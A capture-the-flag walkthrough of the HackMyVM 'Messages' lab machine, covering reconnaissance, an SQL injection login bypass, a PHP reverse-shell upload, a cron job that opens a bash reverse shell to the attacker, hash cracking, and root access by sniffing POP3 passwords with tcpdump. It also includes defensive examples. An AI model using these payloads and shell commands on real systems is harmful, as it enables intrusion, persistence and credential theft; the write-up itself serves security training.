HackMyVM - Messages

 


Messages is a medium difficulty machine that should make you think a little...
As it is a medium machine I will assume a little knowledge and just mention the relevant points rather than detail the simple bits.

Find it

┌──(kali㉿kali)-[~/messages]

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:d5:3a:9b      1      60  PCS Systemtechnik GmbH

 10.0.0.136      08:00:27:b9:c9:3f      1      60  PCS Systemtechnik GmbH


-- Active scan completed, 2 Hosts found.


Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.136

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 11:50 EST

Nmap scan report for 10.0.0.136

Host is up (0.00063s latency).

Not shown: 65525 filtered ports

PORT    STATE SERVICE  VERSION

22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 3f:95:7f:d8:b0:55:f2:55:b0:54:8f:e3:02:01:ac:61 (RSA)

|   256 4c:93:71:5c:f7:45:4a:24:d0:9e:f8:d5:19:64:ee:9a (ECDSA)

|_  256 32:80:9c:9b:8c:b3:c1:8c:9b:51:08:25:32:9c:d6:e4 (ED25519)

25/tcp  open  smtp     Postfix smtpd

|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D

80/tcp  open  http     nginx

|_http-title: Did not follow redirect to https://10.0.0.136/

110/tcp open  pop3     Dovecot pop3d

|_pop3-capabilities: STLS AUTH-RESP-CODE UIDL SASL RESP-CODES CAPA TOP PIPELINING

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

143/tcp open  imap     Dovecot imapd

|_imap-capabilities: LOGIN-REFERRALS IMAP4rev1 have LOGINDISABLEDA0001 ENABLE LITERAL+ capabilities ID IDLE OK post-login Pre-login listed SASL-IR STARTTLS more

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

443/tcp open  ssl/http nginx

| http-robots.txt: 1 disallowed entry 

|_/

|_http-title: Welcome to the Landing Page

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

465/tcp open  ssl/smtp Postfix smtpd

|_smtp-commands: mx.messages.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

|_ssl-date: TLS randomness does not represent time

587/tcp open  smtp     Postfix smtpd

|_smtp-commands: mx.messages.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

|_ssl-date: TLS randomness does not represent time

993/tcp open  imaps?

|_imap-capabilities: LOGIN-REFERRALS IMAP4rev1 have ENABLE AUTH=LOGINA0001 LITERAL+ AUTH=PLAIN ID IDLE Pre-login post-login capabilities listed SASL-IR OK more

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

995/tcp open  pop3s?

|_pop3-capabilities: SASL(PLAIN LOGIN) AUTH-RESP-CODE UIDL USER RESP-CODES CAPA TOP PIPELINING

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

Service Info: Hosts: -mx.messages.hmv,  mx.messages.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 109.08 seconds

So there are a few ports available, mostly messaging related (SMTP, POP3, IMAP etc.).
SSH is restricted to keys only, so let's look at the web pages first.

RCE




Webmail won't be much use without any credentials, so let's look at the chatbot.


Searching for Chatbot v1.0 turns up listed vulnerabilities:

https://www.exploit-db.com/exploits/50673 https://www.exploit-db.com/exploits/50672
The exploit-db.com records also link to the download for the application.
There are multiple ways to exploit this, either by:
a. trying to replace an icon with a malicious PHP script
b. exploiting the SQL injection vulnerability
c. looking at the install documentation for the default credentials

The SQL injection method is actually the easiest way to bypass the admin login.
By setting the username to: admin'-- -
and anything as the password you can just log in.
If the username was unknown or had been changed for security, then:
admin' or username in (select username from users) LIMIT 1;-- -



If you were to look at the source code you would see:

"SELECT * from users where username = '$username' and password = md5('$password') "
So by closing the quote early and using "-- -" the remainder of the line is effectively commented out:

"SELECT * from users where username = '$username'-- -' and password = md5('$password') "
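To make the mechanism concrete, here is a small Python/SQLite model of the query quoted above, next to the parameterised form that closes the hole. This is an added example, not the chatbot's own code: the users table and credentials are constructed, and SQLite's md5() is supplied by a user-defined function to stand in for MySQL's.

```python
# Added example (not the chatbot's code): a Python/SQLite model of the login
# query quoted above, showing why admin'-- - bypasses it and how a
# parameterised query keeps the same input as plain data.
import hashlib
import sqlite3


def md5_hex(value: str) -> str:
    """Stand-in for MySQL's md5(): unsalted MD5 hex digest. Parameterising the
    query does not fix this weak storage; it is why the dumped hashes crack
    so easily later in the writeup."""
    return hashlib.md5(value.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample users table; every credential here is made up."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, md5_hex)  # expose md5() to SQL, as MySQL has it
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", md5_hex("s3cret-admin")), ("alice", md5_hex("alice-pass"))],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The query as the page quotes it: user input is spliced into the SQL
    string, so a quote in the username ends the literal early and -- turns
    the rest of the line (the password check) into a comment."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = md5('{password}')"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened form: placeholders bind the input as data, so the payload is
    looked up literally as a username and matches nothing."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = md5(?)",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "admin'-- -"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # admin
    print("safe      :", login_safe(db, payload, "anything"))  # None
    print("safe, real:", login_safe(db, "admin", "s3cret-admin"))  # admin
```

Run it directly and the first line shows the bypass succeeding with an arbitrary password, while the parameterised query only accepts the real credentials.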

From the Admin settings page there is no restriction on uploading images, so a reverseshell.php file can be uploaded - for example the one from https://pentestmonkey.net/tools/web-shells/php-reverse-shell
First set up a netcat listener on the attack box.


Unfortunately it will quickly become obvious that something is happening, as the connection is terminated after 60 seconds. This appears to come from the webmail settings that prevent long-running queries...


Annoying, but not too much trouble to resolve.
A simple method is to just have cron call you back on a new connection:

echo '#!/bin/bash'>/dev/shm/test.sh
echo 'bash -i >& /dev/tcp/10.0.0.10/5555 0>&1'>>/dev/shm/test.sh
chmod 777 /dev/shm/test.sh
echo "* * * * * /dev/shm/test.sh"|crontab -

Now we have a more stable connection we can have a look around.

Escalate to User

At some point while looking around it is worth seeing if there are any other user credentials in the chatbot database...
/var/www/html/chatbot/initialze.php contains:
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"chatbot");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"chatbot");
if(!defined('DB_NAME')) define('DB_NAME',"chatbot");

Looking in SQL there isn't anything interesting in the chatbot directory; however, the account has rights to other databases...


Save the hashes to Kali and attack them with john:


So we now have credentials to log in to webmail:


And we find a private key for Ruby, and a mail from root saying that the POP3 script is working now?

Escalate to Root

From the emails and notes it is believed that root is polling a POP3 mailbox every minute; running pspy64 also shows UID=0 running /usr/bin/python3 /root/checkmail.py every minute.

Running:
find / -perm -4000 -exec ls -al {} \; 2>/dev/null 
-rwsr-s--- 1 root ruby 1261512 Jan 15  2021 /usr/bin/tcpdump

So we have SUID rights to run tcpdump (it is setuid root and executable by the ruby group).

It should be possible to just packet capture the logon and read the password.


Just need to su - as root and that's it.
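The root step works because the mail poller authenticates to POP3 in the clear, so anyone who can capture port 110 traffic reads the password. The defender's version of that check, as an added example that is my own code and not part of the writeup: scan the client side of captured POP3 sessions and report which ones sent credentials before STLS. The session lines, addresses and usernames are constructed, and the checker deliberately returns usernames only, never the password.

```python
# Added example (not the writeup's code): flag POP3 sessions that
# authenticated in cleartext, i.e. USER/PASS or AUTH PLAIN sent before STLS.
import base64
import re

STLS_RE = re.compile(r"^STLS\b", re.I)
USER_RE = re.compile(r"^USER\s+(\S+)", re.I)
PASS_RE = re.compile(r"^PASS\s+\S", re.I)
AUTH_PLAIN_RE = re.compile(r"^AUTH\s+PLAIN(?:\s+(\S+))?\s*$", re.I)

# Constructed sample: client commands of four POP3 sessions as decoded from a
# capture. Addresses, users and passwords are made up for the example.
SAMPLE_SESSIONS = {
    # 1. classic USER/PASS in the clear: the case the writeup exploits
    "10.0.0.136:110 <- 10.0.0.50:41230": [
        "CAPA", "USER root", "PASS not-the-real-password", "STAT", "QUIT"],
    # 2. client upgrades first; everything after STLS is encrypted and absent
    "10.0.0.136:110 <- 10.0.0.51:41231": ["CAPA", "STLS"],
    # 3. SASL PLAIN with the blob on the AUTH line itself
    "10.0.0.136:110 <- 10.0.0.52:41232": [
        "AUTH PLAIN " + base64.b64encode(b"\0bob\0bob-pass").decode(), "QUIT"],
    # 4. SASL PLAIN in two steps: server answers "+ ", client sends the blob
    "10.0.0.136:110 <- 10.0.0.53:41233": [
        "AUTH PLAIN", base64.b64encode(b"\0carol\0carol-pass").decode(), "QUIT"],
}


def plain_username(blob: str):
    """Return the authcid from a SASL PLAIN blob ([authzid]\\0authcid\\0passwd),
    or None if the text is not a well-formed blob. The password is dropped."""
    try:
        parts = base64.b64decode(blob, validate=True).split(b"\0")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return parts[1].decode("utf-8", "replace") if len(parts) == 3 else None


def cleartext_logins(sessions: dict) -> dict:
    """Map session -> username for every session that completed a cleartext
    authentication before (or without) STLS."""
    findings = {}
    for name, lines in sessions.items():
        user = None
        expect_blob = False  # previous line was a bare AUTH PLAIN
        for line in lines:
            line = line.strip()
            if STLS_RE.match(line):
                break  # remaining traffic is encrypted; nothing to inspect
            if expect_blob:
                expect_blob = False
                found = plain_username(line)
                if found:
                    findings[name] = found
                continue
            m = USER_RE.match(line)
            if m:
                user = m.group(1)
                continue
            if user and PASS_RE.match(line):
                findings[name] = user
                continue
            m = AUTH_PLAIN_RE.match(line)
            if m:
                if m.group(1):
                    found = plain_username(m.group(1))
                    if found:
                        findings[name] = found
                else:
                    expect_blob = True
    return findings


if __name__ == "__main__":
    for session, who in cleartext_logins(SAMPLE_SESSIONS).items():
        print(f"cleartext POP3 login for '{who}' in {session}")
```

Sessions 1, 3 and 4 are reported; session 2 is not, because the credentials travelled inside TLS. The fix on the server side is to refuse authentication until the connection is encrypted (for Dovecot, `disable_plaintext_auth = yes`) and to point pollers like the one in /root/checkmail.py at pop3s on 995 or at STLS on 110.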


